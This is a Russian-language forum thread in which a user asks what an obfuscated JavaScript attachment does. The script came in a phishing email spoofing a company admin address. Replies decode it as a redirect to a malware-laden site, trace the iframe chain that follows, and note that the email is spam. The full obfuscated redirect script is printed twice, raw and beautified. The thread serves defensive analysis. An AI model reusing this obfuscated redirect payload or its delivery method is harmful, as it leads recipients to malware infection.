Попытка взлома сайта? Непонятный JS.

[Mobiler]

Здравствуйте.
Есть сайт фирмы, на котором заведен адрес admin@***.com, также есть другой адрес фирмы на gmail.
2 дня назад на gmail начали приходить письма, якобы с адреса admin@***.com (на самом деле адреса истинного отправителя левые и меняются от письма к письму) с текстом:

This e-mail was send by admin@***.com to notify you that we have temporarily prevented access to your account.

We have reasons to beleive that your account may have been accessed by someone else. Please open attached file (open.html) and Follow instructions.
open.html содержит следующее:

Код:

<script type='text/javascript'>function dX(){};var h=new Date();dX.prototype = {f : function() {var u=function(){};var uY=new Date();var o="";var k=document;var oE=function(){};var l='';this.i=33457;var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];var w=function(){};var p=false;this.pP=false;this.s='';kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');var iK="iK";pK='';this.d="d";uM="";}};this.dK="";var fG=new dX(); var dR="dR";fG.f();hJ=false;</script>

Есть знатоки JS? Помогите плиз узнать, что это за код.
Пытаются взломать админ-панель хостинга или админку цмски?
Или шелл залить?

Прогнал его через _http://jsbeautifier.org/ - получил такое:

Код:

<script type='text/javascript'>
    function dX() {};
    var h = new Date();
    dX.prototype = {
        f: function() {
            var u = function() {};
            var uY = new Date();
            var o = "";
            var k = document;
            var oE = function() {};
            var l = '';
            this.i = 33457;
            var kV = k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];
            var w = function() {};
            var p = false;
            this.pP = false;
            this.s = '';
            kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')] = 'hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');
            var iK = "iK";
            pK = '';
            this.d = "d";
            uM = "";
        }
    };
    this.dK = "";
    var fG = new dX();
    var dR = "dR";
    fG.f();
    hJ = false;
</script>

[chahlic]

Вроде как делает location.replace (то есть редирект) на сайт a--d--v--a--n--c--e--d--w--o--o--d--t--e--c--h.com/xnu4ej/z.htm (двойные тире я добавил). А что там, фиг его знает.

Само это письмо просто спам.....

[Mobiler]

chahlic, спасибо за расшифровку.
Теперь и я, благодаря вам, вижу за этим набором символов url страницы.
hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.Shltlm

На той странице стоит редирект на фарм-сайт (t--o--l--d--s--p--e--a--k.c--o--m) + в iframe с сайта (c--o--p--b--u--n.r--u:8080/i-n-d-e-x.php?pid=10) подгружается js, который, в свою очередь, открывает еще 2 iframe (pdf и html-файл), в которых сидят вирусяки.
Кому интересно - подробнее здесь (отношения к данному сайту не имею, просто нашел там инфу по данному вирусу):
_http://community.ca.com/blogs/securityadvisor/

[zhegloff]

Mobiler, а вы любой спам так досконально изучаете?

[Mobiler]

Цитата:

Сообщение от zhegloff

Mobiler, а вы любой спам так досконально изучаете?

Не любой, а только особенные его формы
Обычный спам идет в СПАМ.
Просто данное сообщение пришло с доверенного (реально существующего) адреса админа корпоративного сайта (на первый взгляд).
Подумал, что данное письмо мог отослать хостер или цмс в ответ на попытки подбора пароля к админке сайта. А может уже что-то поломали и хотят получить больше прав доступа - решил разобраться.

[Последний Герой]

Mobiler, нормальный человек не будет писать с "Admin <admin@domain>", нормальный человек будет писать с "Name <name@domain>" (вместо Name может быть и имя конторы, но просто слово Admin это тупость)
admin@domain - это как правило технологический адрес для приема почты, если письма идут с него неожиданно, можно сразу в мусорку